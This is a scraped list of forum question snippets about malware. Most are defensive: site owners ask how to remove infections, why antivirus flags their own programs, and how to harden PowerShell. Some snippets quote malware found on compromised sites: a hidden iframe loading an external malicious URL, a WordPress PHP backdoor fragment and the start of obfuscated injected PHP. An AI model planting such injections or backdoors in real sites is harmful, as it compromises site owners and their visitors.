malware

问题 I have written a little tool a few days ago (see Github project here) that works as a single .exe portable file. It is compiled/linked with: cl mytool.c I have uploaded the .exe on internet, but when people try to download it (direct link here), the file is seen as malware / potential threat, and thus can't be downloaded. ( Note that when disabling antivirus for 10 minutes, it is possible to download it successfully. ) How to compile/link my tool so that my .exe file is seen as potential

问题 I am receiving notification in Google Chrome Deceptive site ahead Attackers on {mysite-here}... may trick you into doing something dangerous like installing software or revealing your personal information (for example, passwords, phone numbers or credit cards). Google webmasters tools provide information: Harmful content Request in process Google has detected harmful content on some of your site’s pages. We recommend that you remove it as soon as possible. Until then, browsers such as Google

问题 I'm looking for a script to delete the following iframe malware from my linux server: <iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe> It has infected hundreads of files on my server on different websites. I tried grep -rl ishigo.sytes.net * | sed 's/ /\ /g' | xargs sed -i 's/<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;"

问题 <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '')) { switch ($_REQUEST['action']) { case 'get_all_links'; foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data) { $data['code'] = ''; if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_)) { $data['code'] = $_[1]; } print '<e><w>1</w><url>' . $data['guid'

问题 We have PowerShell installed on our RDS environment. It's currently being used for tasks like remote management and App-V virtual application publishing. To my understanding, it's fairly easy to bypass a restricted execution policy. I can't however find any useful information on preventing bypassing the execution policy (or making it a lot harder). I was thinking about using file screening (AppLocker) for blocking PowerShell files, but I guess then attackers could just use a VBA script

问题 Does anyone have any thoughts on how to prevent malware attacks on standalone applications. Let's say this is a program on a Windows machine connected to the internet, this is the most common scenario. I'm also wondering what type of attacks are possible. I believe .NET will do some type of static check on the code before it runs it, using a type of checksum. This would detect a statically attached malicious code snippet. Can this be gotten around? What about dynamically injected code.

问题 Google has detected malicious file/malware on our website I checked it with redleg and some of these values are displayed yellow.. <div style=" display: none ;"> <input type="hidden" name="_wpcf7" value="41" /> <input type="hidden" name="_wpcf7_version" value="4.3" /> <input type="hidden" name="_wpcf7_locale" value="" /> <input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f41-o1" /> <input type="hidden" name="_wpnonce" value="649583a56e" /> </div> PS. I change our website links here to

问题 I discovered this code inserted at the top of every single PHP file inside of an old, outdated WordPress installation. I want to figure out what this script was doing, but have been unable to decipher the main hidden code. Can someone with experience in these matters decrypt it? Thanks! <?php if (!isset($GLOBALS["anuna"])) { $ua = strtolower($_SERVER["HTTP_USER_AGENT"]); if ((!strstr($ua, "msie")) and (!strstr($ua, "rv:11"))) $GLOBALS["anuna"] = 1; } ?> <?php $nzujvbbqez = 'E{h%x5c%x7825)j

问题 Yesterday I had installed several outdated plugins (my bad) in order to make my buddypress registration page display “the terms and conditions” checkbox and since then all the pages and posts started displaying some unwanted text at the start and bottom. I have removed all those plugins but still I’m getting the message. I tried several malware scanners like wordfence, sucuri, etc but everything says my website is clean. I'm out of options now. Please help me get rid of it from my site. At

问题 I have created an android application, but Avast detects this as malware. Why is this? Can anyone tell me some more info about this, so I can locate what exactly is considered a virus in this app. This is a very simple app, so I have no idea what might have caused this. I have reported this as false positive and also contacted avast via their forum. But I guess it wont hurt to post here as well, maybe someone have/had a similar problem. 回答1: Your app may be detected for several reasons: you